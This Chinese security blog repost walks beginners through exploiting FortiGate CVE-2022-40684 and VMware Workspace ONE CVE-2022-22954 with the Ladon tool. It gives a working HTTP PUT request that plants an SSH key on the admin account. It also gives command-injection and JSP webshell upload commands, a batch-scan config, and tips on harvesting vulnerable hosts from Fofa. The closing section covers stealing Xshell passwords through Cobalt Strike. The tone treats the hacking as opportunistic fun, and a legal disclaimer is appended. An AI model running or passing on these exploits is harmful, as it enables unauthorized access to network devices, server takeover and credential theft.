Ladon漏洞复现CVE-2022-40684 CVE-2022-22954

admin 2022年12月24日18:28:25安全漏洞评论31 views2787字阅读9分17秒阅读模式

本文提到的两漏洞早已公开一段时间并被很多人利用,Ladon添加只是为方便新手捡漏学习,外网存在漏洞可能不多了,但内网渗透也可试试捡漏。

0x001 FortiGate  CVE-2022-40684 未授权写SSH-KEY

简介:

Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。FortiProxy 为网站和基于云的应用程序提供安全 Web 网关、安全功能、无与伦比的性能以及最佳用户体验。

漏洞概述:

近日,Fortinet修复了一个存在 FortiGate 防火墙和 FortiProxy Web 代理中的身份验证绕过漏洞(CVE-2022-40684),该漏洞可能允许攻击者在易受攻击的设备上执行未经授权的操作,攻击者通过向易受攻击的目标发送特制的 HTTP 或 HTTPS 请求进行绕过身份认证以管理员身份在控制面板中执行任意操作。

影响版本:

7.0.0 <= FortiOS <= 7.0.6

7.2.0 <= FortiOS <= 7.2.1

7.0.0 <= FortiProxy <= 7.0.6

FortiProxy = 7.2.0

FortiSwitchManager = 7.0.0

FortiSwitchManager = 7.2.0

环境搭建:

FortiGate虚拟化环境

https://pan.baidu.com/s/1eCcjGwqfHqklEFfSurTk7Q?pwd=2jx1

漏洞POC

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1Host: 192.168.50.99User-Agent: Report RunnerAccept-Encoding: gzip, deflate, brAccept: */*Connection: keep-aliveForwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"Content-Length: 409Content-Type:application/json {"ssh-public-key1": ""ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA0/ljPV1Bj2kDxivuK7t4Y8MbIYegGvXza7cRwW9uI49eXccQTJr8kRvwUO5Stf01N5wjgZWYXZEAR3kRRCY/UHF6mZT41mCusbJX/IKrRTcmvwWnDysZuFD3YUZuuQvgWiulvOLczUcUXuRwRQj5gUNdFnbB1M/3t0sg2URXPqEqtNxfCQGpeUswpiGPQRCwU6fW0j5GpsX8CtOk/xagvZDRbBTJCqTR61iUxMO/6c82IxQxVb7Fuf6yvwcQhEPcRJ0YPXj3MeCOZQl/n49q7BQeiUqd+4IOrAqoZ08itGHm1iCsgOhacblcV7z5bnf81Z2wJpH5ja626mwxG2ZD/Q==""}

首先通过OnlinePC探测发现内网中存在FortiGate主机,网上搜索发现该产品7.2.1版本存在未授权漏洞,可Put写入SSH-KEY,任意密码连接SSH。

Ladon漏洞复现CVE-2022-40684 CVE-2022-22954

为了方便,Ladon已集成一键添加Key模块,用户为admin密码admin123,用法命令如下: Ladon IP或URL CVE-2022-40684

Ladon漏洞复现CVE-2022-40684 CVE-2022-22954

新手也可以使用Ladon Study直接使用,熟悉相关命令

Ladon漏洞复现CVE-2022-40684 CVE-2022-22954

成功 会提示 SSH Key ISOK  (使用CS或Powershell打内网 用法一致)

使用Xshell导入Ladon目录下的密钥文件 id_rsa_2048,填写密码admin123,即可连接FortiGate,然后愉快玩耍。

Ladon漏洞复现CVE-2022-40684 CVE-2022-22954


0x002 Vmware Acces CVE-2022-22954  GetShell

简介

安全研究人员警告,VMware身份管理方案Workspace ONE Access一项半年前发现并修补的重大漏洞已经遭到滥用,被植入多项恶意程序。

VMware Workspace One Access原名Identity Manager,今年4月VMware公布并修补了编号CVE-2022-22954的漏洞,可被攻击者通过发送带有恶意指令的消息,发动指令注入攻击,为一项风险值9.8的重大漏洞。

POC: https://github.com/bewhale/CVE-2022-22954

// 命令执行python CVE-2022-22954.py -u https://x.x.x.x -c "id"// 上传文件,windows 设置文件名需要指定路径python CVE-2022-22954.py -u https://x.x.x.x -fn test.jsp  -fp "D:Desktopshell.jsp"// 上传到指定路径python CVE-2022-22954.py -u https://x.x.x.x -fn "/opt/vmware/horizon/workspace/webapps/catalog-portal/test.jsp"  -fp "D:Desktopshell.jsp"


Ladon批量脚本  cve-2022-22954.ini

[Ladon]exe=pythonarg=CVE-2022-22954.py -u $ip$ -c idlog=true

PS:由于fofa收录该产品的数量非常少,所以懒得将PY转成dll,使用INI调用PY批量探测目标,如果数量大,使用PY脚本就不太好。Ladon最佳插件就是.net写的dll,才能完美内存加载占用最少的资源,使用最快速度扫描。

批量命令

通过Fofa或相关搜索引擎,导出vmware主机,然后Ladon批量检测

Ladon url.txt cve-2022-22954.ini

为了方便查看存在的漏洞结果,对PY脚本做一点小修改,回显结果如下

Ladon漏洞复现CVE-2022-40684 CVE-2022-22954

上面是不指定目标乱扫,对于指定目标,比如目标内网或者外网C段、B段,我们可以使用上一篇文章提到的WhatCMS模块探测,若发现存在该产品,即可使用POC打,当然也可以直接使用POC批量探测内网或外网。

Ladon漏洞复现CVE-2022-40684 CVE-2022-22954

Ladon WhatCMS新增多个防火墙、邮服识别

0x003  Xshell密码读取

加载ladon的cna脚本后,Cobalt Strike右键菜单点击就可内存加载XshellPwd模块读取密码,整个过程不会有Ladon文件出现在目标电脑。

Ladon漏洞复现CVE-2022-40684 CVE-2022-22954

本地安装有xshell,自己忘记SSH密码,也可以直接Ladon study读取密码

Ladon漏洞复现CVE-2022-40684 CVE-2022-22954

原文始发于微信公众号(K8实验室):Ladon漏洞复现CVE-2022-40684 CVE-2022-22954

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月24日18:28:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Ladon漏洞复现CVE-2022-40684 CVE-2022-22954 https://cn-sec.com/archives/1480244.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: